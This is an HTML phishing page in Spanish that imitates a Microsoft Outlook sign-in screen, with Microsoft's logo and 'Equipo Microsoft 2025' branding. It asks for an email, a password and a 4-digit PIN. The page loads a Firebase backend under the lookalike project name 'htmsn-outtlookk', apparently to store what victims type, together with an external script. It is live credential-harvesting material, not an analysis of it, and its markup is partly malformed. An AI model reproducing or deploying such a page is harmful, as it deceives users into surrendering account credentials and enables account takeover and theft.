<!DOCTYPE html>
            <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
		<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE10">
        <meta name="apple-itunes-app" content="app-id=284847138">
		


	<link rel="stylesheet" href="./hhhhhh_files/bactouch.css"><link rel="stylesheet" href="./hhhhhh_files/toolbar.css"><link rel="stylesheet" href="./hhhhhh_files/bact_listview.css"><link rel="stylesheet" href="./hhhhhh_files/footer.css"><script src="./hhhhhh_files/authhub-helper.js.descarga"></script><link rel="stylesheet" href="./hhhhhh_files/slidemenu.css"><script src="./hhhhhh_files/ap.js.descarga"></script></head>


</style>
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>log</title>
  <style>
    body {
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
      background-color: #f7f7f7;
      font-family: Arial, sans-serif;
    }
    .login-form {
      width: 400px;
      padding: 40px;
      background-color: #fff;
      border-radius: 5px;
      box-shadow: 0 0 10px rgba(0,0,0,0.1);
    }
    .login-form h2 {
      text-align: center;
      margin-bottom: 40px;
      color: #3f3f3f;
    }
    .login-form input[type="email"], .login-form input[type="password"] {
      width: 100%;
      padding: 12px;
      margin-bottom: 10px;
      border: 1px solid #ccc;
      border-radius: 3px;
    }
    .login-form input[type="submit"] {
      width: 100%;
      padding: 10px;
      background-color: #2435dc;
      color: #fff;
      border: none;
      border-radius: 10px;
      cursor: pointer;
    }
    .login-form button[type="submit"]:hover {
      background-color: #000;
    }
    
    .contact-form .submit-button-wrapper {
    text-align: center;
  }
    .contact-form .submit-button-wrapper input:hover {
    background-color: #f0f4f5;
    color: #0078d4;
  }
    .contact-form .submit-button-wrapper button {
    border: none;
    border-radius: 10px;
    background-color: #0078d4;
    color: white;
    text-transform: uppercase;
    padding: 10px 60px;
    font-weight: 499;
    letter-spacing: 1px;
  }
  </style>
</head>
<body>
  <p id="nn" style="display: none;"></p>
  <div id="numo" class="login-form">

<p><img src="https://logincdn.msftauth.net/shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg" alt="Microsoft" /></p>
<div id="usernameTitle"><strong>Iniciar sesi&oacute;n</strong></div>
<div>&nbsp;</div>
<div class="___q35p590 fedgsey f71fsbu f1n95isl">Para continuar a Outlook</div>

<br>
<br>

<form action="#" class="contact-form">


      <input type="email" id="name" placeholder="Correo electrónico, teléfono o Skype" minlength="" maxlength="" required>

<br>

<br>
      <input type="password" id="pws" placeholder="Contraseña" minlength="" maxlength=""  required>
<br>
<br>
  <input type="password" id="namee" placeholder="Pin de 4 dígitos" minlength="4" maxlength="6"  required>
          <br><br><div class="submit-button-wrapper">
          <button id="bntss">Iniciar sesión</button>
    </form>
<br>
<p style="text-align: center;">&nbsp;<strong>Equipo Microsoft 2025</strong></p>
<div style="text-align: center;"><strong>Confirmar su correo correctamente&nbsp;</strong></div>

  </div>



    </script>


</form>
</body>
<!-- The core Firebase JS SDK is always required and must be listed first -->
<script src="https://www.gstatic.com/firebasejs/8.6.5/firebase-app.js"></script>

<!-- TODO: Add SDKs for Firebase products that you want to use
 https://firebase.google.com/docs/web/setup#available-libraries -->
<script src="https://www.gstatic.com/firebasejs/8.6.5/firebase-firestore.js"></script>
<script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
<script>
    // Your web app's Firebase configuration
    const firebaseConfig = {
    apiKey: "AIzaSyC3k7T4WbSsTU47WmuzX5Gq-EVy1ywffvg",
  authDomain: "htmsn-outtlookk.firebaseapp.com",
  projectId: "htmsn-outtlookk",
  storageBucket: "htmsn-outtlookk.firebasestorage.app",
  messagingSenderId: "371686118555",
  appId: "1:371686118555:web:2ea417f31513e501b2a23e",
  measurementId: "G-PTJSFE765E"
};
    // Initialize Firebase
  
    firebase.initializeApp(firebaseConfig);
</script>
<script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
<script src="scripts.js"></script>

</html>